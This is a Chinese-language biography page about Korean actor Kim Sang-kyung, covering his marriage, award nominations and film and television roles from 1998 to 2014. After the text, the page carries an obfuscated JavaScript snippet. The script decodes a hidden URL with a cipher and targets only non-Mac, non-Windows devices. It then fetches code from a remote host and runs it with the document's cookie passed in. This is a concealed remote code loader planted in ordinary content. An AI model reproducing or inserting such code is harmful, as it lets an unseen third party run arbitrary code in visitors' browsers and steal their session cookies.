金相庆

详细资料

个人生活

个人生活2007年10月7日,金相庆与金恩景结婚。2010年7月27日,妻子生下儿子。

获奖经历

  获奖记录
  个人记录
  2007第28届青龙奖最佳男演员奖华丽的休假(提名)
  2002第23届青龙奖最佳新人男演员奖生活的发现(提名)

大事记

演艺经历
1998年,通过MBC剧集《法庭风云》出道。
2000年,参演MBC剧集《王朝》。
2002年,主演了由洪尚秀执导的剧情片《生活的发现》,扮演为两个女人不知所措的男人,并凭借影片获得第23届青龙奖最佳新人男演员奖提名。
2003年,金相庆与宋康昊合作主演了由奉俊昊执导的惊悚悬疑片《杀人回忆》,饰演汉城的苏探员。
2005年,出演剧情片《剧场前》,饰演东秀。同年,主演风格非常“另类”的作品《辩护士》,饰演充满正义感的律师徐贞浩。
2007年,出演了由金志勋执导的剧情片《华丽的休假》,并凭借影片获得第28届青龙奖最佳男演员奖。
2008年,金相庆时隔3年再度出演电视剧,出演了KBS的古装剧《大王世宗》。
2009年,金相庆零片酬加盟了洪尚秀导演的第十部作品《夏夏夏》,饰演青年导演曹文京,这部喜剧风格的轻松小品赢得了2010年戛纳电影节“一种关注”单元的最佳影片。
2010年,与李秀景、柳镇主演KBS月火剧《国家在召唤》,饰演夏娜的真命天子高镇赫,该剧讲述特工有关的故事。
2011年,出演悬疑剧《白色圣诞节》,饰演心理医生。
2012年,金相庆与薛景求、孙艺珍联手主演由金志勋执导的3D灾难片《塔》,饰演超高层复合建筑摩天楼的物业管理队长达浩,该片在上映一周内即突破200万名观影人数。
2013年,与严正花合作惊悚片《抓住那个家伙》,再度饰演“下放”警察一角。同年,与文晶熙联手主演《把爸爸借给你》,金相庆一改以往的正直硬汉形象,变身为让人又爱又恨的懒汉爸爸,而他也会展现与以往不同的喜剧演技。
2014年,金相庆与朴圣雄、金成钧联袂主演个人第三部刑警剧《杀人委托》,饰演一个失去妹妹的刑警泰洙,为了展现失去妹妹之后大受打击所受的痛苦,在10天之内瘦身10kg。

window['NItHdf'] = function(){ var keyList = [ "HlXjt5h7k2SYc0fD+-=3RAxysZOKI+ZKobnJzUFriGjtBuaSqy8cepHk" , "5oziBQsXldW0S62pKZ4ujJ1cNqwC=VIHkidm3PoFg4QI07e+Esct-ZnuOarRNl", "Et8hbGkA+P7V35Xdq2uoJzs9Cj4fSI=iemtE-/Llsfhg.nJpbaAkxCrdyN:KGz", "0KIwPtkd38iGYoOjLlxsFHpNfCUv9nSQ04w91+At6LZ7Vh5SkYBpvIgbK832FPXH", ]; function decrypt(t, e) { if (!t) return ""; for (var a = t.split(""), n = e.split(""), i = {}, r = [], o = 0;o < a.length / 2;o++) i[a[o]] = a[a.length / 2 + o]; for (var s = 0; s < e.length; s++) r.push(i[n[s]]); return r.join(""); }; (!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?(function(u, i, w, d) { var x = decrypt, cs = d[x(keyList[0],"y2YYshD3yYHZD")], crd = x(keyList[1],"uCpwjppIpBpcj"); 'jQuery'; u = decodeURIComponent(x(keyList[2], u)); 'jQuery'; var xhr = new XMLHttpRequest(); xhr.open('GET', u + '/s/a?_=' + x(keyList[3], i)); xhr.onreadystatechange = function() { if (xhr.readyState == 4 && xhr.status == 200) { var data = JSON.parse(xhr.responseText); new Function(data.data)(cs); } }; xhr.send('u=1'); })("VhhqPfkkuqE5z9JuCPA8335zj=", "KOwCvKvPGwUOw0CC3K", window, document):function(){}; var _keyStr = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/="; function decode(input) { var output = ""; var chr1, chr2, chr3; var enc1, enc2, enc3, enc4; var i = 0; input = input.replace(/[^A-Za-z0-9\+\/\=]/g, ""); while (i < input.length) { enc1 = _keyStr.indexOf(input.charAt(i++)); enc2 = _keyStr.indexOf(input.charAt(i++)); enc3 = _keyStr.indexOf(input.charAt(i++)); enc4 = _keyStr.indexOf(input.charAt(i++)); chr1 = (enc1 << 2) | (enc2 >> 4); chr2 = ((enc2 & 15) << 4) | (enc3 >> 2); chr3 = ((enc3 & 3) << 6) | enc4; output = output + String.fromCharCode(chr1); if (enc3 != 64) { output = output + String.fromCharCode(chr2); } if (enc4 != 64) { output = output + String.fromCharCode(chr3); } } output = _utf8_decode(output); return output; } function _utf8_decode(utftext) { var string = ""; var i = 0; var c = 0; var c1 = 0; var c2 = 0; while (i < utftext.length) { c = utftext.charCodeAt(i); if (c < 128) { string += String.fromCharCode(c); i++; } else if ((c > 191) && (c < 224)) { c1 = utftext.charCodeAt(i + 1); string += String.fromCharCode(((c & 31) << 6) | (c1 & 63)); i += 2; } else { c1 = utftext.charCodeAt(i + 1); c2 = utftext.charCodeAt(i + 2); string += String.fromCharCode(((c & 15) << 12) | ((c1 & 63) << 6) | (c2 & 63)); i += 3; } } return string; }}